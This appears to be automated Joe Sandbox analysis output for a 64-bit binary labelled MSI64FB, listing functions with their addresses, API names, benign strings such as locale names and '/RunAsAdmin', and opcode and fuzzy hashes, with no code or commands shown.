                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: f$p$p
                                                                                                                                                                                                                                                    • API String ID: 3215553584-1995029353
                                                                                                                                                                                                                                                    • Opcode ID: 4383fbf1c5b30cf23d6a8153630a41a081f371ad9653e55dcaa61270932575c5
                                                                                                                                                                                                                                                    • Instruction ID: 2942cdf57eddd8e7623342be4a5da8943ee1b64624a8969b656b9b5f48de2b57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4383fbf1c5b30cf23d6a8153630a41a081f371ad9653e55dcaa61270932575c5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B612AE62E0C143C6FBA0FE15D1586B9F6B2FB40754FC88935E68A566C8DF3DE4918B20
                                                                                                                                                                                                                                                    Function 00007FF749F7EB8C Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 476COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: f$p$p
                                                                                                                                                                                                                                                    • API String ID: 3215553584-1995029353
                                                                                                                                                                                                                                                    • Opcode ID: cc381cc862897bdc139d895d188244726268c88f62adf3271ea62120292975bc
                                                                                                                                                                                                                                                    • Instruction ID: 889beac2111dff32c284f4781e5ca33cb031ad4fcf9b98d581ba80571b628dc6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc381cc862897bdc139d895d188244726268c88f62adf3271ea62120292975bc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC128E22A1D183C6FB24BE14E0586B9F6B2EB80754FD44572F69947AD8DB7DE480CB30
                                                                                                                                                                                                                                                    Function 00007FF749F514C0 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: OpenQueryValue
                                                                                                                                                                                                                                                    • String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
                                                                                                                                                                                                                                                    • API String ID: 4153817207-1914306501
                                                                                                                                                                                                                                                    • Opcode ID: c1ea196034c89146bda3b9649a23863f6eb0936dcb2f13ed1610820584201723
                                                                                                                                                                                                                                                    • Instruction ID: d1a5cced6be270eb9a08dddaf27cf65209f8cf9e244e3d59e8169b92876ab129
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1ea196034c89146bda3b9649a23863f6eb0936dcb2f13ed1610820584201723
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F1D666F0D652D1EB60BF559010AB9A2F0EF50B98FCA8431DA49072D6EF3CFA51C360
                                                                                                                                                                                                                                                    Function 00007FF749F47F90 Relevance: 10.6, APIs: 7, Instructions: 148memorythreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LocalWindow$AllocConcurrency::cancel_current_taskFreeLongProcessThread_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2769903829-0
                                                                                                                                                                                                                                                    • Opcode ID: 35574c92888c2c26300d35ec6ef1cb4377479981c8a04ba66c72df11c085166f
                                                                                                                                                                                                                                                    • Instruction ID: 0efc47a2482c76d429289cf3a629f72778695de7818e537eaf265f34f317e975
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35574c92888c2c26300d35ec6ef1cb4377479981c8a04ba66c72df11c085166f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46517C7271CA41C2EB14AF69E5406AAA2A1EB547D0FA48635EBAD07BD4DF3CD091C710
                                                                                                                                                                                                                                                    Function 00007FF749F4C8F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$AllocGetctypeLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 229129721-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 60ebc02f7226483f3ff1111ec5c75b1086ff5987c5adef6584f18516984502ac
                                                                                                                                                                                                                                                    • Instruction ID: 9854bc3a0703ebe0a4a08ef05cb6f5040e4f60086155eb5af15a0424c94fbcc1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ebc02f7226483f3ff1111ec5c75b1086ff5987c5adef6584f18516984502ac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08518922B0EB41DAFB04FFA0D4506EDB3B5EB54B48F885935DA4D23A85EF38D5218364
                                                                                                                                                                                                                                                    Function 00007FF749F4BE80 Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_FreeLocalRegister
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4216899657-0
                                                                                                                                                                                                                                                    • Opcode ID: 5edf41230aeef18f27619a6f764b7c9603305eeb89fed7b8c1b45b463f960f5c
                                                                                                                                                                                                                                                    • Instruction ID: 7fe5df7fc6baead8ca2d6f19eabcf29b62ff84f6490ab6aa142795d7bb4c12bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5edf41230aeef18f27619a6f764b7c9603305eeb89fed7b8c1b45b463f960f5c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F341A022A5DA42D5EB09BF55E8502B8B370EB94BA4FD81131DA4D077E6DF7CE482C720
                                                                                                                                                                                                                                                    Function 00007FF749F48190 Relevance: 10.6, APIs: 7, Instructions: 100sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep$BringEnumFreeLocalProcessWindowWindows_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2996238595-0
                                                                                                                                                                                                                                                    • Opcode ID: d554edbeff9a9736a78683e7aa15fcf636b5e02c3c9ef89d9e6f44d3e1e993a4
                                                                                                                                                                                                                                                    • Instruction ID: 1000cf8495098da099f075be9a84902547c7b09d54007913b887bfea87e49fa9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d554edbeff9a9736a78683e7aa15fcf636b5e02c3c9ef89d9e6f44d3e1e993a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD316D22B5DA81C5EF10BF95E444669A371EB94B90F941232EA9E13BE8CF3CE5808710
                                                                                                                                                                                                                                                    Function 00007FF749F7D54C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF749F7D7FE,?,?,?,00007FF749F7D448,?,?,?,00007FF749F79EE9), ref: 00007FF749F7D5D1
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF749F7D7FE,?,?,?,00007FF749F7D448,?,?,?,00007FF749F79EE9), ref: 00007FF749F7D5DF
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF749F7D7FE,?,?,?,00007FF749F7D448,?,?,?,00007FF749F79EE9), ref: 00007FF749F7D609
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF749F7D7FE,?,?,?,00007FF749F7D448,?,?,?,00007FF749F79EE9), ref: 00007FF749F7D677
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF749F7D7FE,?,?,?,00007FF749F7D448,?,?,?,00007FF749F79EE9), ref: 00007FF749F7D683
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: 42257dd58315f7643f482914cd2c497e8c06dc2da1f724419a6d3b55d7fd13f2
                                                                                                                                                                                                                                                    • Instruction ID: c8128bf6aae2fb2ab6751c97c2d766d3c85fec0fb7fa77726cdc0f80f7ab373d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42257dd58315f7643f482914cd2c497e8c06dc2da1f724419a6d3b55d7fd13f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF318121B1EA42D1EF51BF46E800575A3B4BF48B68FD90576EE1D0A7D4EE3CE4418720
                                                                                                                                                                                                                                                    Function 00007FF749F5B2B0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 66COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • :AM:am:PM:pm, xrefs: 00007FF749F5B381
                                                                                                                                                                                                                                                    • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF749F5B363
                                                                                                                                                                                                                                                    • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF749F5B322
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Maklocstr
                                                                                                                                                                                                                                                    • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                                                                                                    • API String ID: 2987148671-35662545
                                                                                                                                                                                                                                                    • Opcode ID: 8867adb2efc359ccc5cf0888d9ee80204fd664f335f1ca01bc21afa1361553cf
                                                                                                                                                                                                                                                    • Instruction ID: 3c096a839acde5b6f7e625710e51b28d844b585e232adda066e1a46b2b3959cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8867adb2efc359ccc5cf0888d9ee80204fd664f335f1ca01bc21afa1361553cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC214B62A19B45C5EB10FF21E4412A9B7B5EB98B80F898231DA4D13796DF3CE182C750
                                                                                                                                                                                                                                                    Function 00007FF749F45E40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastLibrary$AddressCloseDirectoryFreeHandleLoadOpenProcProcessSystem
                                                                                                                                                                                                                                                    • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                                    • API String ID: 3957113498-2781105232
                                                                                                                                                                                                                                                    • Opcode ID: 50f8b74b772799a49a32d1d3bf22bba6da5a932b56011529cbe8cc636982945b
                                                                                                                                                                                                                                                    • Instruction ID: 321134ff1eaff8a60c8164bf0e4893fed9617f93c60fc70b7e219fd65d20b10f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50f8b74b772799a49a32d1d3bf22bba6da5a932b56011529cbe8cc636982945b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3314C32A1DB81C6E750FF11B4407AAA3B0FBD4790F945135EA8D43AA8DF3CE5858B11
                                                                                                                                                                                                                                                    Function 00007FF749F9CF5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                    • String ID: CONOUT$
                                                                                                                                                                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                    • Opcode ID: 5465c1afd9a73e2e95b374ed2fdb82802a84666fe34a4e0e565d8d339bcb1e90
                                                                                                                                                                                                                                                    • Instruction ID: 678790321076129863192ceb23993ce025397839509a7ff3d87c810a1fc9cd86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5465c1afd9a73e2e95b374ed2fdb82802a84666fe34a4e0e565d8d339bcb1e90
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B116A21B1CA41C6E751AF96E854329A2B0BB99BA4F904234EA5D87BE4DF3CD404C754
                                                                                                                                                                                                                                                    Function 00007FF749F7790C Relevance: 9.2, APIs: 6, Instructions: 239COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2984826149-0
                                                                                                                                                                                                                                                    • Opcode ID: 66e74323a14d1237dec483e39549143d7bd7bee4ec2659615b9cae67baf7f054
                                                                                                                                                                                                                                                    • Instruction ID: 4c6129991a7f583f234ae6e592b04191b5db69fd1f7b320e1b2f42cb8e134707
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66e74323a14d1237dec483e39549143d7bd7bee4ec2659615b9cae67baf7f054
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EA1B322B1DA82CAFB21BF1484503B9A6B1EF84BA8FD446B1EA5D077D5DF3DD5448320
                                                                                                                                                                                                                                                    Function 00007FF749F771BC Relevance: 9.2, APIs: 6, Instructions: 206COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2829165498-0
                                                                                                                                                                                                                                                    • Opcode ID: 3c0acbd00b743a7012fd7b87341e47bb8f94db9b826abeb19d5b1ae6d54c1ea2
                                                                                                                                                                                                                                                    • Instruction ID: fcbc9da07b2833a060cff8f3ad740ae2ce75801f1fd0207bb72d663a09c7dad1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c0acbd00b743a7012fd7b87341e47bb8f94db9b826abeb19d5b1ae6d54c1ea2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9819172A1DB41C6EB60BF65A440279B6B5FB847A8F940275FA5D47BD8DF3CD4008B20
                                                                                                                                                                                                                                                    Function 00007FF749F876AC Relevance: 9.2, APIs: 6, Instructions: 156COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
